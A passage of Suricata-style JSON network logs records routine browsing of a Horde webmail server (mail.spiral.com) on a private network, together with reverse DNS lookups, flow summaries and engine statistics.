Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":89},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listTopTags","state":"CLOSED","stored":false,"size":78,"tx_id":0}} {"timestamp":"2020-02-29T00:20:03.976837+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52918,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button-delete.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":117},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/button-delete.png","state":"CLOSED","stored":false,"size":117,"tx_id":12}} {"timestamp":"2020-02-29T00:20:04.468667+0000","flow_id":811820461074107,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":53750,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":62219,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:20:04.579983+0000","flow_id":811820461074107,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":53750,"proto":"UDP","dns":{"type":"answer","id":62219,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:20:04.579983+0000","flow_id":811820461074107,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":53750,"proto":"UDP","dns":{"type":"answer","id":62219,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:20:05.093693+0000","flow_id":2077710532005367,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52922,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde&group=identities","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":20},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":233,"tx_id":0}} 
{"timestamp":"2020-02-29T00:20:05.103615+0000","flow_id":2077710532005367,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52922,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde&group=identities","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":4382}} {"timestamp":"2020-02-29T00:20:05.261009+0000","flow_id":2077710532005367,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52922,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde&group=identities","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":4382},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":20182,"tx_id":0}} {"timestamp":"2020-02-29T00:20:05.262166+0000","flow_id":2077710532005367,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52922,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/alerts\/success.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":469}} 
{"timestamp":"2020-02-29T00:20:06.000228+0000","event_type":"stats","stats":{"uptime":14858,"capture":{"kernel_packets":137242,"kernel_drops":0},"decoder":{"pkts":137243,"bytes":94148933,"invalid":192,"ipv4":135700,"ipv6":10,"ethernet":137243,"raw":0,"null":0,"sll":0,"tcp":130215,"udp":5278,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098784},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2832,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2848,"synack":2839,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1868,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2416,"failed_udp":112},"tx":{"http":4788,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2498}},"flow_mgr":{"closed_pruned":2803,"new_pruned":17,"est_pruned":2466,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":21497,"memcap_state":0,"memcap_global":0},"http":{"memuse":54359,"memcap":0}}} 
{"timestamp":"2020-02-29T00:20:09.000660+0000","flow_id":347324023631198,"event_type":"flow","src_ip":"192.168.10.122","src_port":49690,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:15:08.716126+0000","end":"2020-02-29T00:15:08.826187+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:20:10.000688+0000","flow_id":1067809082562313,"event_type":"flow","src_ip":"192.168.10.122","src_port":34810,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:15:09.186121+0000","end":"2020-02-29T00:15:09.294351+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:20:10.002024+0000","flow_id":376680125051247,"event_type":"flow","src_ip":"192.168.10.122","src_port":34528,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:15:08.930159+0000","end":"2020-02-29T00:15:09.038527+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:20:10.267171+0000","flow_id":2077710532005367,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52922,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/alerts\/success.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":469},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/alerts\/success.png","state":"CLOSED","stored":false,"size":469,"tx_id":1}} {"timestamp":"2020-02-29T00:20:11.000774+0000","flow_id":1222994856334552,"event_type":"flow","src_ip":"192.168.10.130","src_port":34880,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":4,"bytes_toserver":1167,"bytes_toclient":643,"start":"2020-02-29T00:19:05.218328+0000","end":"2020-02-29T00:19:10.359486+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:20:13.000141+0000","event_type":"stats","stats":{"uptime":14865,"capture":{"kernel_packets":137255,"kernel_drops":0},"decoder":{"pkts":137258,"bytes":94155456,"invalid":192,"ipv4":135715,"ipv6":10,"ethernet":137258,"raw":0,"null":0,"sll":0,"tcp":130230,"udp":5278,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":685,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097632},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2832,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2848,"synack":2839,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect"
:{"alert":25},"app_layer":{"flow":{"http":1869,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2416,"failed_udp":112},"tx":{"http":4789,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2498}},"flow_mgr":{"closed_pruned":2804,"new_pruned":17,"est_pruned":2469,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":1,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20504,"memcap_state":0,"memcap_global":0},"http":{"memuse":19654,"memcap":0}}} {"timestamp":"2020-02-29T00:20:13.001735+0000","flow_id":148136325567662,"event_type":"flow","src_ip":"192.168.10.122","src_port":45317,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:15:12.611502+0000","end":"2020-02-29T00:15:12.719590+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:20:13.602993+0000","flow_id":2114307948884849,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":38148,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":62318,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:20:13.714116+0000","flow_id":2114307948884849,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38148,"proto":"UDP","dns":{"type":"answer","id":62318,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:20:13.714116+0000","flow_id":2114307948884849,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38148,"proto":"UDP","dns":{"type":"answer","id":62318,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:20:13.773965+0000","flow_id":600409286444339,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52924,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3423}} {"timestamp":"2020-02-29T00:20:14.000659+0000","flow_id":1624213506063863,"event_type":"flow","src_ip":"192.168.10.122","src_port":43745,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:15:13.425463+0000","end":"2020-02-29T00:15:13.533751+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:20:14.000956+0000","flow_id":104855940204179,"event_type":"flow","src_ip":"192.168.10.122","src_port":50670,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:15:13.624275+0000","end":"2020-02-29T00:15:13.729610+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:20:14.001088+0000","flow_id":978800180569870,"event_type":"flow","src_ip":"192.168.10.122","src_port":50520,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:15:13.763662+0000","end":"2020-02-29T00:15:13.872716+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:20:16.652632+0000","flow_id":600409286444339,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52924,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3423},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":18034,"tx_id":0}} {"timestamp":"2020-02-29T00:20:16.662657+0000","flow_id":80645229386881,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":55639,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":62642,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:20:16.774063+0000","flow_id":80645229386881,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":55639,"proto":"UDP","dns":{"type":"answer","id":62642,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:20:16.774063+0000","flow_id":80645229386881,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":55639,"proto":"UDP","dns":{"type":"answer","id":62642,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:20:16.879486+0000","flow_id":600409286444339,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52924,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=imp","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3799}} {"timestamp":"2020-02-29T00:20:16.925711+0000","flow_id":600409286444339,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52924,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=imp","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3799},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":20554,"tx_id":1}} {"timestamp":"2020-02-29T00:20:16.928813+0000","flow_id":600409286444339,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52924,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2951}} {"timestamp":"2020-02-29T00:20:16.930401+0000","flow_id":345374128613512,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52926,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/basic\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1633}} {"timestamp":"2020-02-29T00:20:16.980134+0000","flow_id":345374128613512,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52926,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/basic\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1633},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/basic\/screen.css","state":"CLOSED","stored":false,"size":6255,"tx_id":0}} {"timestamp":"2020-02-29T00:20:16.980407+0000","flow_id":345374128613512,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52926,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-center-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":103}} {"timestamp":"2020-02-29T00:20:16.982215+0000","flow_id":345374128613512,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52926,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-center-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":103},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/navi-center-active.png","state":"CLOSED","stored":false,"size":103,"tx_id":1}} {"timestamp":"2020-02-29T00:20:16.983390+0000","flow_id":600409286444339,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52924,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2951},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/screen.css","state":"CLOSED","stored":false,"size":12657,"tx_id":2}} {"timestamp":"2020-02-29T00:20:16.983592+0000","flow_id":600409286444339,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52924,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-left-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; 
rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":179}} {"timestamp":"2020-02-29T00:20:17.025464+0000","flow_id":345374128613512,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52926,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-right-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":161}} {"timestamp":"2020-02-29T00:20:17.064556+0000","flow_id":600409286444339,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52924,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-left-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":179},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/navi-left-active.png","state":"CLOSED","stored":false,"size":179,"tx_id":3}} {"timestamp":"2020-02-29T00:20:17.064917+0000","flow_id":600409286444339,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52924,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1742}} {"timestamp":"2020-02-29T00:20:18.000801+0000","flow_id":1152402773196756,"event_type":"flow","src_ip":"192.168.10.130","src_port":34878,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":34,"pkts_toclient":39,"bytes_toserver":4542,"bytes_toclient":40700,"start":"2020-02-29T00:18:55.933844+0000","end":"2020-02-29T00:19:17.296921+0000","age":22,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:20:18.001075+0000","flow_id":745974314004663,"event_type":"flow","src_ip":"192.168.10.130","src_port":34882,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":8,"pkts_toclient":10,"bytes_toserver":1862,"bytes_toclient":6621,"start":"2020-02-29T00:19:11.618679+0000","end":"2020-02-29T00:19:17.006675+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:20:20.000363+0000","event_type":"stats","stats":{"uptime":14872,"capture":{"kernel_packets":137308,"kernel_drops":0},"decoder":{"pkts":137317,"bytes":94179587,"invalid":192,"ipv4":135774,"ipv6":10,"ethernet":137317,"raw":0,"null":0,"sll":0,"tcp":130285,"udp":5282,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":685,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097344},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2835,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2851,"synack":2842,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1871,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2418,"failed_udp":112},"tx":{"http":4797,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2500}},"flow_mgr":{"closed_pruned":2804,"new_pruned":17,"est_pruned":2473,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":19840,"memcap_state":0,"memcap_global":0},"http":{"memuse":88884,"memcap":0}}} 
{"timestamp":"2020-02-29T00:20:21.601070+0000","flow_id":412190935165934,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":60597,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":62216,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:20:21.634801+0000","flow_id":600409286444339,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52924,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1742},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/favicon.ico","state":"CLOSED","stored":false,"size":1742,"tx_id":4}} {"timestamp":"2020-02-29T00:20:21.712317+0000","flow_id":412190935165934,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":60597,"proto":"UDP","dns":{"type":"answer","id":62216,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:20:21.712317+0000","flow_id":412190935165934,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":60597,"proto":"UDP","dns":{"type":"answer","id":62216,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 